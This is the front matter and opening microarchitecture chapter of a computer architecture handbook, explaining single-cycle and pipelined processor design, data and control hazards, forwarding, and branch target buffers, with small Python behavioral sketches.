Handbook of Computer Architecture
Anupam Chattopadhyay, Editor
This work is subject to copyright. All rights are solely and exclusively licensed by the Publisher, whether
the whole or part of the material is concerned, specifically the rights of translation, reprinting, reuse
of illustrations, recitation, broadcasting, reproduction on microfilms or in any other physical way, and
transmission or information storage and retrieval, electronic adaptation, computer software, or by similar
or dissimilar methodology now known or hereafter developed.
The use of general descriptive names, registered names, trademarks, service marks, etc. in this publication
does not imply, even in the absence of a specific statement, that such names are exempt from the relevant
protective laws and regulations and therefore free for general use.
The publisher, the authors and the editors are safe to assume that the advice and information in this book
are believed to be true and accurate at the date of publication. Neither the publisher nor the authors or
the editors give a warranty, expressed or implied, with respect to the material contained herein or for any
errors or omissions that may have been made. The publisher remains neutral with regard to jurisdictional
claims in published maps and institutional affiliations.
This Springer imprint is published by the registered company Springer Nature Singapore Pte Ltd.
The registered company address is: 152 Beach Road, #21-01/04 Gateway East, Singapore 189721,
Singapore
Acknowledgments

This book represents a collective effort of several years. It would be impossible to list everyone who contributed, directly or indirectly, to the production of this volume. In the following, a partial list of contributions and acknowledgments is offered.
I would first like to thank the Springer representatives, Ramesh Premnath and Stephen Yeung, who initially pitched this idea and helped to kickstart the book concept. Avi Mendelson, in the early ideation stage, presented critical feedback on the content and organization. I cannot but express my most sincere gratitude to the section editors, not listed in any particular order: Suhaib Fahmy, Mohamed M. Sabry Aly, Jeronimo Castrillon, Grant Edmund Martin, and Sayak Ray. They not only helped shape the book by presenting ideas on the content distribution but also kept in close correspondence with the chapter authors for timely chapter submission and reviewed the iterations, thereby ensuring the high quality of the volume. Considering that several section editors themselves contributed chapters to this book, the effort is truly grand, for which I remain very thankful. The chapter authors (nearly 100!) spent considerable time summarizing the vast content of the computer architecture topics relevant to their expertise within the constraints of space. On behalf of the section editors, I am sincerely thankful to the authors for their valuable contributions.
Last but not least, Salmanul Faris Nedum Palli and Daniel Diwakar, who served as production editors of this book at various stages, worked tirelessly throughout the production. I remain truly thankful to them for their tremendous effort over the years.
Contents
Volume 1
1 Microarchitecture
Freddy Gabbay
2 The Architecture
Avi Mendelson
3 Architectures for Self-Powered Edge Intelligence
Amit Ranjan Trivedi, Jaeha Kung, and Jong Hwan Ko
4 Real-Time Scheduling for Computing Architectures
Arvind Easwaran, Michael Yuhas, Saravanan Ramanathan, and Ankita Samaddar
5 Secure Processor Architectures
Nikhilesh Singh, Vinod Ganesan, and Chester Rebeiro
6 Bus and Memory Architectures
Trevor E. Carlson
Volume 2
Index
About the Editor
Section Editors
Jeronimo Castrillon
Chair for Compiler Construction
cfaed – Center for Advancing Electronics Dresden
SCADS.AI – Center for scalable data analytics and
artificial intelligence Dresden/Leipzig
6G-life Hub – Digital transformation and sovereignty
of future communication networks
Technische Universität Dresden
Dresden, Germany
Suhaib A. Fahmy
King Abdullah University of Science and Technology
(KAUST)
Department of Computer, Electrical and Mathematical
Sciences and Engineering
Thuwal, Saudi Arabia
Sayak Ray
Intel Corporation
Intel Product Assurance and Security (IPAS)
San Jose, CA, USA
Contributors
Roope Kaivola Core and Client Development Group, Intel Corporation, Hillsboro,
OR, USA
Ryan Kastner University of California San Diego, La Jolla, CA, USA
Ayesha Khalid Centre for Secure Information Technologies (CSIT), Queen’s
University Belfast, Belfast, UK
M. V. Achutha Kiran Kumar DEG, Intel Corporation, Bengaluru, India
Jong Hwan Ko Sungkyunkwan University (SKKU), Suwon, Republic of Korea
Tim Kogel Synopsys, Inc., Aachen, Germany
Akash Kumar Technische Universität Dresden, Dresden, Germany
Dur-e-Shahwar Kundi Centre for Secure Information Technologies (CSIT),
Queen’s University Belfast, Belfast, UK
Jaeha Kung Daegu Gyeongbuk Institute of Science and Technology (DGIST),
Daegu, Republic of Korea
Vadim Kustov Cadence Design Systems, Tensilica R&D, San Jose, CA, USA
Yi-Hsiang Lai Cornell University, Ithaca, NY, USA
Dirk Lanneer Synopsys, Leuven, Belgium
Zhaoying Li National University of Singapore, Singapore, Singapore
Tung-Che Liang Department of Electrical and Computer Engineering, Duke
University, Durham, NC, USA
Sung Kyu Lim Atlanta, USA
Gai Liu Xilinx, Inc., San Jose, CA, USA
Suhas Madhusudana Cadence Design Systems, Tensilica R&D, San Jose, CA,
USA
Grant Edmund Martin Pleasanton, CA, USA
Xavier Martorell Barcelona Supercomputing Center, Barcelona, Spain
Christian Menard Chair for Compiler Construction, TU Dresden, Dresden,
Germany
Avi Mendelson CS Department, Technion, Haifa, Israel
Farhad Merchant University of Groningen, Groningen, The Netherlands
Tulika Mitra National University of Singapore, Singapore, Singapore
Vojtech Mrazek Faculty of Information Technology, Brno University of Technology, Brno, Czech Republic
John O’Leary Core and Client Development Group, Intel Corporation, Hillsboro,
OR, USA
Miquel Pericàs Chalmers University of Technology, Gothenburg, Sweden
Christian Pilato Dipartimento di Elettronica, Informazione e Bioingegneria,
Politecnico di Milano, Milano, Italy
Andy D. Pimentel Parallel Computing Systems Group, University of Amsterdam,
Amsterdam, The Netherlands
Bharath Srinivas Prabakaran Institute of Computer Engineering, Technische
Universität Wien (TU Wien), Vienna, Austria
Saravanan Ramanathan Nanyang Technological University, Singapore,
Singapore
Behnaz Ranjbar Technische Universität Dresden, Dresden, Germany
Sandip Ray Department of ECE, University of Florida, Gainesville, FL, USA
Sayak Ray Intel Corporation, San Jose, CA, USA
Chester Rebeiro Indian Institute of Technology Madras, Chennai, India
Siva Satyendra Sahoo Technische Universität Dresden, Dresden, Germany
Ankita Samaddar Nanyang Technological University, Singapore, Singapore
Muhammad Shafique Engineering Division, New York University Abu Dhabi,
Abu Dhabi, United Arab Emirates
Nikhilesh Singh Indian Institute of Technology Madras, Chennai, India
Amit Kumar Singh University of Essex, Colchester, UK
Stephanie Soldavini Dipartimento di Elettronica, Informazione e Bioingegneria,
Politecnico di Milano, Milano, Italy
Nitish Srivastava Google LLC, Mountain View, CA, USA
Cynthia Sturton University of North Carolina at Chapel Hill, Chapel Hill, NC,
USA
Xavier Teruel Barcelona Supercomputing Center, Barcelona, Spain
Amit Ranjan Trivedi University of Illinois at Chicago, Chicago, IL, USA
Suryansh Upadhyay Pennsylvania State University, University Park, PA, USA
Johan Van Praet Synopsys, Leuven, Belgium
Yakir Vizel Technion - Israel Institute of Technology, Haifa, Israel
Zheng Wang Shenzhen Institute of Advanced Technology, Chinese Academy of
Sciences, Shenzhen, China
Contents
Introduction
Single-Cycle Processor Design
  Processor Data Path
  Processor Control Unit
Pipelining
  Pipeline Principle and Performance Metrics
  Pipelined Processors
  Pipeline Hazards
Multiple-Issue Processor
Conclusions
References
Abstract
F. Gabbay, The Institute of Electrical Engineering and Applied Physics, The Hebrew University of Jerusalem, Jerusalem, Israel
Keywords
Introduction
In the past decades, CPUs have been challenged by an incredible growth in the number of applications, driven by the Internet revolution and followed by the mobile and data revolutions, which affect every field of everyday life. The growing demand for performance and scale, and the diversity of use cases, have continuously fueled the need for advanced processor microarchitectures that can satisfy these goals. For several decades, advances in VLSI technology provided a tailwind to processor performance through a continuous increase in clock frequency. Even though frequency scaling under Moore's law ceased in the first decade of the twenty-first century, the need for powerful processors has continued to grow, and architects have been required to deliver revolutionary microarchitectural innovations to satisfy the growing demand for powerful processing. Artificial intelligence and high-performance computing applications have raised the performance bar even higher by introducing a demand for processing power on the scale of exaflops. Along with the need for high-performance processors, power considerations have become a crucial factor, not only for mobile applications and edge devices but also in cloud servers and datacenters, where power is a major part of operating expenses. New applications such as IoT, wearable devices, edge computing, and the automotive market have introduced specific needs for customized processors, where performance is not always the ultimate goal; rather, cost, die area, real-time considerations, and the heterogeneous integration of processors, peripherals, and accelerators are of main interest.
In this chapter, a processor microarchitecture is introduced stepwise, relying on digital building blocks. The chapter starts with a single-cycle processor microarchitecture, where the design of both the data path and the control unit is presented. The chapter broadly discusses microarchitectural design considerations of single-cycle processors and presents the metrics for performance evaluation. Next, the pipelined processor core is presented with its data path and control unit.
Single-Cycle Processor Design
A common processor design relies on the von Neumann machine model, which was introduced in 1945 by John von Neumann. The von Neumann model proposes an architecture for a digital computer which consists of the following elements:
• A central processing unit (CPU) that contains arithmetic logic unit (ALU, also
known as data path), local registers, and a control unit
• Memory unit that stores program instructions and data
• Input and output devices such as an external storage device, a network connec-
tion, a display, a keyboard, etc. (Fig. 1).
A similar processor model to the Von Neumann model is the Harvard architec-
ture (Sloss et al. 2004) depicted by Fig. 2. In the Harvard architecture scheme, a
separate memory is used for the program instructions and program data.
The Harvard architecture machine model will be the baseline for the processor design discussed further. In this chapter, the processor architecture is assumed to be a Reduced Instruction Set Computer (RISC) architecture (Hennessy and Patterson 2011), similar to the MIPS (Hennessy and Patterson 2011) or RISC-V (Patterson and Waterman 2017) processors, which employ the following types of instructions (Table 1).
• Fetch – an instruction is fetched from memory, and the program counter (PC) is
incremented to the next instruction.
• Decode – an instruction is decoded; the control unit generates the needed control
signals for the data path. Source registers are read (when applicable) from the
register file.
The instruction fetch circuit is illustrated by Fig. 3. The pointer to the instruction to be fetched from memory is maintained by the program counter (PC) register. The PC is incremented by 4 (assuming a 4-byte instruction size) every cycle, unless a control flow instruction changes the PC sequence. When the PC sequential order changes, the new target address is loaded into the PC under the control signal PC-ctrl.
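As a minimal illustration, the following Python sketch models this PC update logic (the signal names follow the figure; the 4-byte increment and the PC-ctrl select are taken from the text, while everything else is an assumption of the sketch):

def next_pc(pc, pc_ctrl, target_address):
    """Compute the next program counter value.

    pc_ctrl = 0: sequential fetch, the PC advances by the 4-byte
    instruction size. pc_ctrl = 1: a control flow instruction
    redirects fetch to target_address.
    """
    return target_address if pc_ctrl else pc + 4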
The instruction decode circuit is illustrated by Fig. 4. The process of decoding an
instruction involves extracting the opcode, source register 1 (sreg1), source register
2 (sreg2), destination register (dreg), and sign-extended immediate (sxtimm) fields
from the instruction binary code. In addition, sreg1, sreg2, and dreg signals are sent
to the register file to specify the identifiers of registers to be accessed. The register
file scheme, illustrated by this figure, consists of a bank of the architectural registers
which are accessible by one write port and two read ports. The number of read
and write ports is determined by the maximum number of source and destination operands of an instruction. In the processor architecture presented in this chapter, up to two source operands and one destination operand are assumed. The read ports are implemented by two multiplexors, each controlled by the corresponding sreg1 and sreg2 signals. The outputs of the multiplexors provide the values of the source operands being read, sregval1 and sregval2. The write port is implemented by a decoder which asserts the enable signal of the register that corresponds to the destination register, dreg. When the enable signal is asserted, the write data, dregval, is sampled by the corresponding register. Note that the decoder is gated by the RegWrEn signal, which enables writes to the register file. When RegWrEn=0, no write operations can be performed.
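A minimal behavioral sketch of this register file in Python, assuming 32 architectural registers and the signal names from the figure:

class RegisterFile:
    """Behavioral model: two read ports, one write port, gated by RegWrEn."""

    def __init__(self, num_regs=32):
        self.regs = [0] * num_regs

    def read(self, sreg1, sreg2):
        # Two read ports, modeled as multiplexors selecting by register id.
        return self.regs[sreg1], self.regs[sreg2]

    def write(self, dreg, dregval, reg_wr_en):
        # The decoder asserts the enable of the destination register only
        # when RegWrEn is set; otherwise no register samples dregval.
        if reg_wr_en:
            self.regs[dreg] = dregval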
The execution circuit, illustrated by Fig. 5, performs the computation of results for ALU-type instructions. The sregval1 signal is connected to the first input port of the ALU, while the second port is connected to either sregval2 or the sign-extended immediate value, sxtimm. The selection between the two options is performed by a multiplexor controlled by the selimm signal. For load/store instructions, the ALU calculates the effective address for the memory access. The first port of the ALU is fed by the base register (through sregval1), while the displacement is selected through the immediate field. For example, for the lw r1, 100(r2) instruction, the base register r2 value, read from the register file, is sent to the ALU through the sregval1 signal, while the displacement, 100, is taken from the immediate field of the instruction, sign extended, and selected by the multiplexor for the second port of the ALU. Conditional control flow instructions are also processed by this circuit. Typically, such instructions are PC-relative branches which encode their target address in the immediate field of the instruction binary code as an offset from PC+4. The sign-extended immediate field, sxtimm, is added to PC+4 to calculate the target branch address in case the control flow instruction is taken; in this case, the new target address is loaded into the PC, as illustrated by Fig. 3. Conditional control flow instructions also require evaluating the branch condition. In the presented design, it is assumed that there are two types of conditional branch instructions, beq and bne (similar to the MIPS architecture (Kane 1988)). For both instructions, the two source operands are compared by the ALU; in case they are equal, the zero signal is set to 1; otherwise, the zero signal is set to 0. The zero signal is used in conjunction with the instruction opcode (beq or bne) by the control unit logic to generate the PC-ctrl signal depicted by Fig. 3.
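The following Python sketch ties these pieces together for the execute stage; the operand selection by selimm and the zero flag for beq/bne follow the text, while the ALU operation encoding is an assumption of the sketch:

def execute(sregval1, sregval2, sxtimm, selimm, alu_op):
    """Execute stage: select the second operand, run the ALU, derive zero.

    selimm = 1 selects the sign-extended immediate (used for
    ALU-immediate instructions and load/store effective addresses);
    selimm = 0 selects sregval2.
    """
    operand2 = sxtimm if selimm else sregval2
    if alu_op == "add":      # also the effective-address calculation
        alu_result = sregval1 + operand2
    elif alu_op == "sub":    # also compares the operands for beq/bne
        alu_result = sregval1 - operand2
    else:
        raise ValueError("unsupported ALU operation in this sketch")
    zero = 1 if alu_result == 0 else 0
    return alu_result, zero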
The data memory access circuitry is illustrated by Fig. 6. The memory address,
calculated by the ALU, is sent to the data memory address through the ALUresult
signal. In case of data memory write (store instruction), the data to be written is read
from the register file using the second source operand identifier. The register value,
denoted by the sregval2, is connected to the Data in input of the data memory. In the
case of memory read (load instruction), the data read from the data out port of the
memory is connected to the Memout signal which is written to the register file by the
write-back circuitry. The memory control signals MemWrEn and MemRdEn control the memory write and read operations, respectively. These signals are asserted by the control unit based on the instruction opcode.
Finally, the write-back circuitry is shown by Fig. 7. Write-back operations can be performed by either ALU instructions or load instructions. In accordance with the instruction opcode, the control unit sets the MemALUsel signal of the multiplexor to select between the ALUresult and Memout values to be sent to the register file write port signal, dregval.
The full data path is illustrated by Fig. 8. The depicted data path is obtained by connecting together the five circuits shown in the previous figures.
Processor Control Unit
The processor control unit provides the control signals to the core data path, as shown by Fig. 9. As can be observed, the control unit has two input signals, the instruction opcode and the zero indication. The control unit output signals are PC-ctrl, ALUctrl, MemWrEn, MemRdEn, RegWrEn, and MemALUsel. The control unit of a single-cycle core can be implemented as a combinational circuit, described by the following truth tables for each of the instruction types (Tables 2, 3, and 4).
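A behavioral sketch of such a control unit in Python; the opcode names are illustrative stand-ins, and the actual encodings are those of Tables 2, 3, and 4:

def control_unit(opcode, zero):
    """Combinational control: map the opcode (plus the zero flag) to the
    data-path controls (pc_ctrl, mem_wr_en, mem_rd_en, reg_wr_en,
    mem_alu_sel)."""
    if opcode == "alu":
        return (0, 0, 0, 1, 0)         # write the ALU result to the register file
    if opcode == "lw":
        return (0, 0, 1, 1, 1)         # read memory, write Memout back
    if opcode == "sw":
        return (0, 1, 0, 0, 0)         # write memory, no register write
    if opcode == "beq":
        return (zero, 0, 0, 0, 0)      # redirect the PC when operands are equal
    if opcode == "bne":
        return (1 - zero, 0, 0, 0, 0)  # redirect the PC when operands differ
    raise ValueError("unknown opcode in this sketch")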
Pipelining
Now that the simple single-cycle processor has been designed, the next step is to examine its performance in quantitative terms. As a reminder, the single-cycle core, illustrated by Fig. 8, processes a single instruction every clock cycle. It was previously identified that the processing of an instruction includes the phases summarized by Table 5 per instruction type.
As can be observed from this table, the efficiency of the single-cycle processor is relatively low. For example, once an instruction is fetched, the fetch hardware becomes idle through the rest of the phases until a new instruction is fetched again. Similar idleness can be identified for the other hardware mechanisms, such as the decode logic, register file, ALU, and memory.
As can be observed from the table below, the whole process of pizza making takes 20 min; however, the pizzeria staff utilization is far from optimal. The dough preparation employee is utilized only 40% of the pizza preparation time, the utilization of the topping employee is as low as 10%, and the baking employee is utilized 50% of the time. Such a staffing of the pizza line is obviously inefficient due to the hidden unemployment at every stage, as illustrated by the following figure (Table 6).
The reason for the low utilization of the pizza line is the sequential processing of every task: every pizza line employee does not start processing a new pizza until the whole preparation of the previous pizza is completed. In order to examine the pizza line quantitatively, throughput is defined as the number of jobs or tasks completed per unit of time:

Throughput = Tasks Completed / Time    (1)
As can be observed from Fig. 10, the throughput of the pizza line is one pizza per 20 min, or three pizzas per hour. The throughput and employee utilization can be significantly improved if the pizza processing is executed in a pipelined manner. Pipelining is a common technique used in a variety of applications, such as manufacturing lines and many others. The concept of a pipeline relies on partitioning the processing of a job or task into multiple pipeline stages, where every stage starts processing a new task as soon as it is available. As a result, all pipeline stages work in parallel while processing different portions of different jobs. Pipelining the pizza line is illustrated by Fig. 11.
As can be observed from this figure, all three pizza line workers work in parallel on three different pizzas. In addition, pizzas are moved from one stage to another every 10 min; this is determined by the slowest stage, which is the pizza baking in the presented case. When examining the throughput of the pizza line, it is observed that a pizza is completed every 10 min, or six pizzas per hour. Therefore, pipelining in this example gains a 2× throughput improvement with respect to the sequential pizza line. It can also be noticed that the preparation time of a single pizza has become even worse, since it involves three pipeline stages of 10 min each, resulting in a total preparation time of 30 min. In spite of the fact that the latency of pizza preparation gets worse, the employee utilization is significantly improved. For example, the dough preparation stage utilization is now 80%, while the topping stage utilization is 20% and the baking stage utilization is 100%.
Can the pipeline be broken into more stages for further improvement? The answer is yes, but this of course depends on whether the tasks in every pipeline stage can be further divided into smaller stages. For example, if one can break both the dough preparation stage and the baking stage into two equal stages each, then the following pizza line is obtained.
The pizza line illustrated by Fig. 12 consists of five pipeline stages. This time a pizza is moved from one stage to another every 5 min, and therefore the throughput is twelve pizzas per hour. This yields a 2× throughput improvement with respect to the three-stage pizza line and a 4× throughput improvement with respect to the sequential pizza line. Can one continue breaking the pipeline into more stages and gain an infinite throughput? Although this might be implied theoretically, in practice pipeline stages cannot be infinitely broken into smaller stages, for several reasons. First, it is not always possible to break a given task into smaller tasks, since some operations may be indivisible (atomic). Second, the process of moving the pizza from one stage to another involves a certain overhead which was not taken into account in the throughput calculation; for example, moving the pizza from one stage to another requires some extra time for each of the employees to carry the pizza to the next stage.
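This trade-off can be captured in a few lines of Python; the fixed 1-minute hand-off overhead below is an illustrative assumption, not a number from the text:

def pipeline_throughput(total_work_min, num_stages, handoff_overhead_min=1.0):
    """Jobs completed per hour for an ideally balanced pipeline: each stage
    takes total_work_min / num_stages plus a fixed hand-off overhead, and
    one job completes per stage time once the pipeline is full."""
    stage_time = total_work_min / num_stages + handoff_overhead_min
    return 60.0 / stage_time

# With 20 minutes of total work, deeper pipelines show diminishing returns:
for stages in (1, 3, 5, 10, 20):
    print(stages, round(pipeline_throughput(20, stages), 1))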
Pipelined Processors
The destination register identifier, dreg, is carried through the pipeline sampling stages and is used by the write-back stage as the identifier for the register file write port.
The pipelined processor design also requires some slight modifications in the control unit. Recall that the control unit is implemented as a combinational circuit using the opcode and zero signal inputs to generate the needed control signals for the processor data path. Since the opcode is available to the control unit at the decode stage, the output control signals of the control unit need to be retimed to their corresponding pipeline stages. The retiming of the control signals is presented by Fig. 15: the ALUctrl is retimed with one sampling stage to the execution stage.
The MemWrEn and MemRdEn are retimed to the memory stage with two sampling stages. Finally, the MemALUsel and RegWrEn are retimed to the write-back stage with three sampling stages.
Now that the five-stage pipeline core has been established, one can exercise the processing of the following code through the pipeline stages, depicted by Fig. 16. The pipelined processor achieves the maximum possible throughput of one instruction completion per clock cycle. Is this always the case? Can the processor achieve the maximum possible throughput for every program? This question leads to the next discussion.
Pipeline Hazards
Taking a deeper look at the pipelined processor, it is possible to identify that its pipeline implementation may involve pipeline hazards. A pipeline hazard is defined as a situation in the pipeline that may lead to incorrect execution of an instruction. Pipelined processors may have three types of pipeline hazards:
• Data hazards
• Control hazards
• Structural hazards
Pipeline hazards are the next focus of the discussion: data hazards may occur due to incorrect data transfer between instructions, control hazards are related to control flow operations such as branches or jumps, while structural hazards are related to pipeline hardware resource conflicts.
Data Hazards
In order to further examine the pipelined processor, one may consider the following code.
As can be observed from Fig. 17, instruction 1 writes to r1 while all the successive instructions read r1. Instruction 1 writes the r1 value to the register file only at clock cycle 5, while instructions 2, 3, and 4 read r1 before it is updated in the register file; only instructions 5 and 6 in the example above read the correct value of r1. This type of hazard is termed a read-after-write (RAW) hazard or true-data dependency. A true-data dependency (or RAW hazard) occurs when an instruction reads an outdated source operand because it has not been calculated
or written yet. This may lead to incorrect program execution, and therefore the next discussion will delve into various microarchitectural solutions to this problem. The RAW hazard is the only type of data hazard that may occur in a single-pipeline processor; in the later discussion of multiple-issue processors, additional types of data hazards will be introduced. Typically, RAW hazards are associated with data that is transferred through registers, though, theoretically, they can also occur when data is transferred through memory. In the presented pipelined processor, RAW hazards can only be related to registers rather than memory, since all read and write memory accesses take place at the same pipeline stage, the memory stage. How can data hazards be solved then? A simple method is to have the compiler insert no-operation (nop) instructions between true-data-dependent instructions, as illustrated by Fig. 18.
The nop insertion method has a major impact on pipeline utilization. As can be observed from Fig. 18, such an approach reduces pipeline utilization and increases the effective CPI of the processor. Instruction scheduling, illustrated by Fig. 19, is another approach to handling data hazards. In this case, the compiler (or the programmer) reorders instructions within the program (while preserving program correctness) so that independent instructions separate the dependent ones. Instruction scheduling can significantly improve pipeline utilization if independent instructions can be found for rescheduling. The limitation of this technique is mainly that it is performed at compile time, where the pool of candidate independent instructions for rescheduling may be limited due to the lack of run-time information (such as branch direction, etc.).
A similar approach to nop insertion is a hardware-based interlock mechanism which dynamically detects data hazards and generates pipeline stalls, which performance-wise are equivalent to nop insertion (Fig. 20). Since this is implemented by the hardware, the compiler is relieved of the nop insertion, and therefore the program footprint is smaller. A pipeline interlock scheme typically consists of two logical functions: (1) RAW hazard detection and (2) stall insertion, as illustrated by Fig. 21. The RAW hazard detection circuitry compares the source registers (sreg1 and sreg2) of the instruction in the decode stage with the destination register (dreg) of the instructions at the execute, memory, and write-back stages. In case of a match, a stall-generation signal is asserted. The stall-generation signal is connected to the processor control unit, which overrides the control signals generated for the decoded instruction (presented by Tables 2, 3, and 4). When the stall generation is true, the control signals are overridden with the values presented by Table 8. These overridden values are equivalent to a nop instruction since they keep the architectural state of the processor unchanged. The overridden control signals continue to be inserted into the pipeline till the stall-generation signal becomes false.
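The hazard-detection comparisons can be sketched in Python as follows (the per-stage records and field names are assumptions mirroring Fig. 21):

def raw_hazard_stall(decode_insn, downstream_insns):
    """Return True if the decoded instruction must be stalled.

    decode_insn: dict with 'sreg1' and 'sreg2' source register ids.
    downstream_insns: the instructions currently at the execute, memory,
    and write-back stages; each has a 'dreg' field and a 'reg_wr_en'
    flag telling whether it actually writes the register file.
    """
    for insn in downstream_insns:
        if insn is None or not insn["reg_wr_en"]:
            continue
        if insn["dreg"] in (decode_insn["sreg1"], decode_insn["sreg2"]):
            return True   # match: assert the stall-generation signal
    return False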
A closer look reveals that the result of the first instruction is already available at the end of its execution stage, while the second instruction, which is data dependent on the first one, needs the value of r1 only when it starts execution. If the register file-based data transfer between instructions can be bypassed, these data hazards and stalls may be eliminated. The forwarding concept relies on this principle by employing a bypass network (also termed a forwarding network) which allows instructions to transfer data while bypassing the register file (this technique is also sometimes referred to as bypassing). In order to implement the forwarding mechanism, the first step is to modify the register file implementation (presented by Fig. 4). The new implementation, illustrated by Fig. 22, allows a write and reads of the same register to take place in the same clock cycle. This is done by adding two bypass multiplexors and two comparators. Each of the comparators compares the destination register identifier with one of the source register identifiers. In case of a match, the multiplexor replaces the original value read from the register file with the value of the register being written. This scheme helps to eliminate one out of the three stall cycles in the pipelined processor, as illustrated by Fig. 23, since write and read operations to the same register are now allowed to take place in the same clock cycle. In order to eliminate the additional pipeline stalls and further improve pipeline utilization, the forwarding network illustrated by Fig. 24 is introduced.
The illustrated forwarding network monitors the destination register identifiers of instructions which have completed their execute or memory stage and compares them with the sreg1 and sreg2 register identifiers of the instruction that entered the execute stage. In case of a match, the most up-to-date value of the corresponding register is selected by the 3-to-1 multiplexors illustrated by the figure. It should be noted that the forwarding logic complicates the pipeline design: additional hardware is added (comparators, multiplexors, and interconnect wires) which may increase silicon area and power. In addition, it may affect the critical path of the logical circuit, resulting in reduced clock frequency. Another implementation option for the forwarding network, as part of the microarchitectural considerations, is to retime the comparators and move them from the execution stage to the decode stage, as illustrated by the following figure (Fig. 25).
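The operand selection performed by this forwarding network can be sketched as follows in Python; preferring the younger in-flight result is consistent with selecting the most up-to-date value, and the tuple layout is an assumption of the sketch:

def forward_operand(sreg, regfile_val, ex_mem, mem_wb):
    """Pick the most up-to-date value for source register sreg.

    ex_mem / mem_wb: results of the instructions that just completed the
    execute and memory stages, as (dreg, value, reg_wr_en) tuples or None.
    The 3-to-1 multiplexor prefers the younger result (ex_mem).
    """
    if ex_mem and ex_mem[2] and ex_mem[0] == sreg:
        return ex_mem[1]   # forward from the execute stage output
    if mem_wb and mem_wb[2] and mem_wb[0] == sreg:
        return mem_wb[1]   # forward from the memory stage output
    return regfile_val     # no match: use the register file value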
Control Hazards
Control hazards, also known as control dependencies, occur in pipelined processors whenever the control flow of the processor changes. Ideally, if computer programs could be written without jumps or conditional branches, control hazards would be avoided. For the sake of simplicity, three types of control flow instructions are considered:
All three types of control flow instructions can change the program counter and disrupt the sequential instruction fetch process. Unfortunately, the processing of such instructions cannot take place immediately as soon as they enter the pipeline, since it takes several clock cycles until their resolution. The resolution of a control flow instruction involves identifying the instruction type, calculating the target address, and evaluating the branch condition for conditional branches. As a result, as long as the outcome of such a control flow instruction is not resolved, the next instruction to be fetched into the pipeline cannot be determined. In the pipelined processor design illustrated by Fig. 14, the resolution of control flow instructions occurs at the memory stage, where the PC control is generated and the target address updates the program counter.
This phenomenon, known as a control hazard, may result in incorrect execution due to consecutive instruction fetches until the resolution. This situation is illustrated by Fig. 28, where it can be observed that, in the case that the conditional branch is taken, three consecutive instructions are fetched and executed till the branch processing is resolved (at the memory stage).
One possible solution for control hazards is to stall the pipeline, in a similar fashion to data hazards, by employing the pipeline interlock mechanism. This guarantees the correct execution of a program, but it leads to a major performance degradation since control flow instructions are quite frequent. For example, assume a program with an ideal CPI=1 and a branch frequency of 20%. Every branch instruction in the presented processor involves three stall cycles until resolution. Therefore, the effective CPI becomes 1+0.2*3=1.6, a major performance degradation of 37.5% with respect to the ideal CPI. It can also be noted that the deeper the pipeline, the greater the branch penalty. For example, by breaking every pipeline stage of the processor into two stages, the branch resolution stage moves to the seventh or eighth stage; such a pipelined processor incurs a 6-7 clock cycle penalty for every control flow instruction.
Moving forward, while keeping Amdahl's law in mind ("make the common case run faster"), there is an essential need for an effective solution that guarantees correct program execution while improving the utilization of the pipelined processor. Toward that direction, the first step in handling control hazards is to reduce the branch penalty. This can be done by moving the branch resolution to an earlier pipeline stage. In the current processor design, the branch resolution takes place at the memory stage. Assuming the branch resolution is moved to the decode stage, the branch penalty can be reduced from three clock cycles to one clock cycle. The required microarchitectural changes in the pipeline data path are depicted by Fig. 29 (pipeline data path with branch resolution at the decode stage) in light gray. First, the adder that calculates the target address is moved from the execution stage to the decode stage. Next, a new comparator is added to compare the two source register values; this comparison was previously done by the ALU at the execution stage, and since the ALU can be busy processing the instruction currently in the execution stage, it can no longer be used for this task. There are several important implications of these changes: (1) The added logic increases die area and power. (2) The logical path calculating the PC target becomes much more stressed from a timing point of view, because in the same clock cycle the PC is incremented by 4, the sign-extended immediate is added, and the target address is sent through a multiplexor to the PC register. This timing path is shown in red in Fig. 29. From the design point of view, assuming that this path is not the critical path of the processor (the ALU- and memory-related logical paths typically take longer), it will still require using faster logical elements and as a result may affect the processor power.
Figure 30 illustrates the control hazard when branch resolution is moved to the decode stage. It can be observed that this reduces the control hazard penalty in the processor from three cycles to one cycle.
The proposed design change of performing branch resolution at the decode stage affects the forwarding mechanism. So far, the assumption was that forwarded values are needed at the execution stage; now, de facto, the processing of control flow instructions is performed at the decode stage. This implies that when a branch instruction is true-data dependent on a predecessor instruction, the branch is stalled at the decode stage for one clock cycle till the dependent source value can be forwarded. This situation, illustrated by Fig. 31 (RAW hazards associated with a branch instruction processed at the decode stage), requires two design modifications in the pipelined processor:
• The forwarding network will have to be changed so that it can forward values to control flow instructions at the decode stage. This adds comparators and multiplexors which may stress timing paths and can increase cycle time and power.
• The pipeline control unit will have to detect this situation and stall the branch for an additional clock cycle at the decode stage.
The next improvements for handling control hazards are based on speculation, also known as branch prediction. The principle of branch speculation relies on two fundamental mechanisms: (1) a branch predictor and (2) a pipeline flush mechanism which can flush all mis-speculated (mis-predicted) instructions that follow the branch. As long as the prediction is correct, the branch penalty is saved; however, in case of mis-speculation, the flush mechanism is activated to invalidate all the instructions from the mis-predicted path. The flush mechanism is usually implemented in the processor control unit: upon detection of a branch mis-prediction, the control unit performs the flush by invalidating the control signals of the instructions, in a similar fashion to the stall generation described earlier.
Before moving forward with the branch predictor discussion, the performance metrics used for the quantitative evaluation of branch prediction schemes are defined. The first metric, the branch mis-prediction rate (MR), is defined as the number of mis-predicted branches divided by the total number of executed branch instructions.
There are two types of branch prediction mechanisms: static and dynamic. Static branch prediction usually provides a constant prediction of not taken and continues fetching instructions in a sequential manner. Once the branch is resolved, if the prediction was correct, the branch penalty is avoided; however, if the branch was mis-speculated (mis-predicted), all the instructions from the mis-speculated path are flushed. A static prediction of taken is more complicated to implement since the branch target is unknown at the fetch stage. Dynamic branch predictors attempt to predict both the branch direction and the target address dynamically by learning branch behavior from its history. The most common implementation of a dynamic branch predictor is termed the Branch Target Buffer (BTB), illustrated by Fig. 32.
The BTB is organized as a cache structure. Each BTB entry consists of a tag, a valid bit, a target address, and a history bit. The look-up process in the BTB is usually performed at the fetch stage and is similar to the cache memory look-up process. The index field of the PC selects a set, while the tag field is compared against the tags in the entries of all the ways within the set. In case one of the tags matches and valid=1, the look-up hits (a BTB hit), and the target field and the history bit are read from the corresponding matched entry. The history bit is used to determine the branch direction: if the history bit is 1, the branch is predicted taken; otherwise, the branch is assumed not taken. When the branch is predicted taken, the target field is loaded into the PC in the next clock cycle, and the fetch stage continues fetching instructions from the target address in a consecutive manner. In case of a BTB miss (the PC is not found in the BTB), the fetch stage continues the instruction fetch sequentially. Once the branch is resolved, the following actions take place:
• The BTB is updated based on the branch resolution: both history and target fields.
